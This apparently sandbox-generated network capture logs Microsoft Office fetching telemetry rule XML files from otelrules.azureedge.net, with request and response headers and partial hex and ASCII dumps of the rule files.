                                          2024-11-18 22:45:04 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:04 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1397
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                          ETag: "0x8DC582BDFD43C07"
                                          x-ms-request-id: bbb23919-f01e-005d-46d2-3713ba000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224504Z-16547b76f7f2b5qzhC1DFWeag400000004p000000000cdfp
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:04 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          126192.168.2.45740513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:04 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:04 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:04 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1360
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                          ETag: "0x8DC582BDD74D2EC"
                                          x-ms-request-id: 244cb6a9-901e-0048-0390-38b800000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224504Z-r18f44ddb694v9hbhC1DFW4shn00000000kg00000000ankc
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:04 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          127192.168.2.45740613.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:04 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:04 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:04 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1427
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                          ETag: "0x8DC582BE56F6873"
                                          x-ms-request-id: b72e63d2-001e-0079-62d2-3712e8000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224504Z-1866b5c5fbbb9dv9hC1DFWps5c00000001k000000000kavv
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:04 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          128192.168.2.45740713.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:04 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:04 UTC522INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:04 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1390
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                          ETag: "0x8DC582BE3002601"
                                          x-ms-request-id: d35e782a-f01e-00aa-2adc-398521000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224504Z-r18f44ddb69pgpd4hC1DFWgac800000000h000000000b6uc
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L2_T2
                                          X-Cache: TCP_REMOTE_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:04 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          129192.168.2.45740813.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:05 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:05 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:05 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1401
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                          ETag: "0x8DC582BE2A9D541"
                                          x-ms-request-id: 10622547-201e-0085-529f-3734e3000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224505Z-16547b76f7fxqj4khC1DFWpypw00000003p0000000013u5c
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:05 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          130192.168.2.45740913.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:05 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:05 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:05 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1364
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                          ETag: "0x8DC582BEB6AD293"
                                          x-ms-request-id: 15349be3-801e-0047-5579-377265000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224505Z-17cf5b775c482xjhhC1DFWhqac00000000h0000000002x3u
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:05 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          131192.168.2.45741113.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:05 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:05 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:05 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1354
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                          ETag: "0x8DC582BE0662D7C"
                                          x-ms-request-id: e3d993a2-401e-0083-2409-37075c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224505Z-16547b76f7fp6s5dhC1DFWe28g00000003m000000000v6td
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:05 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          132192.168.2.45741013.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:05 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:05 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:05 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1391
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                          ETag: "0x8DC582BDF58DC7E"
                                          x-ms-request-id: e3d9936e-401e-0083-0609-37075c000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224505Z-1866b5c5fbbnjgfwhC1DFW3usc00000001r000000000d2mc
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:05 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          133192.168.2.45741213.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:05 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:05 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:05 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1403
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                          ETag: "0x8DC582BDCDD6400"
                                          x-ms-request-id: e00571ae-f01e-0052-6cd2-379224000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224505Z-16547b76f7fzwxm2hC1DFWt5hw00000004400000000014pe
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache-Info: L1_T2
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:05 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          134192.168.2.45741313.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:06 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:06 UTC515INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:06 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1366
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                          ETag: "0x8DC582BDF1E2608"
                                          x-ms-request-id: 480f4005-301e-0099-21f5-396683000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224506Z-164f84587bfn7ppchC1DFW45b400000000rg00000000zux9
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          X-Cache-Info: L1_T2
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:06 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          135192.168.2.45741413.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:06 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:06 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:06 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1399
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                          ETag: "0x8DC582BE8C605FF"
                                          x-ms-request-id: b3f05f3e-001e-0065-58c4-380b73000000
                                          x-ms-version: 2018-03-28
                                          x-azure-ref: 20241118T224506Z-16559997f87vprq2hC1DFWczdn00000000ng0000000046e8
                                          x-fd-int-roxy-purgeid: 0
                                          X-Cache: TCP_HIT
                                          Accept-Ranges: bytes
                                          2024-11-18 22:45:06 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          136192.168.2.45741513.107.246.45443
                                          TimestampBytes transferredDirectionData
                                          2024-11-18 22:45:06 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                          Connection: Keep-Alive
                                          Accept-Encoding: gzip
                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                          Host: otelrules.azureedge.net
                                          2024-11-18 22:45:06 UTC494INHTTP/1.1 200 OK
                                          Date: Mon, 18 Nov 2024 22:45:06 GMT
                                          Content-Type: text/xml
                                          Content-Length: 1362
                                          Connection: close
                                          Vary: Accept-Encoding
                                          Cache-Control: public, max-age=604800, immutable
                                          Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                          ETag: "0x8DC582BDF497570"
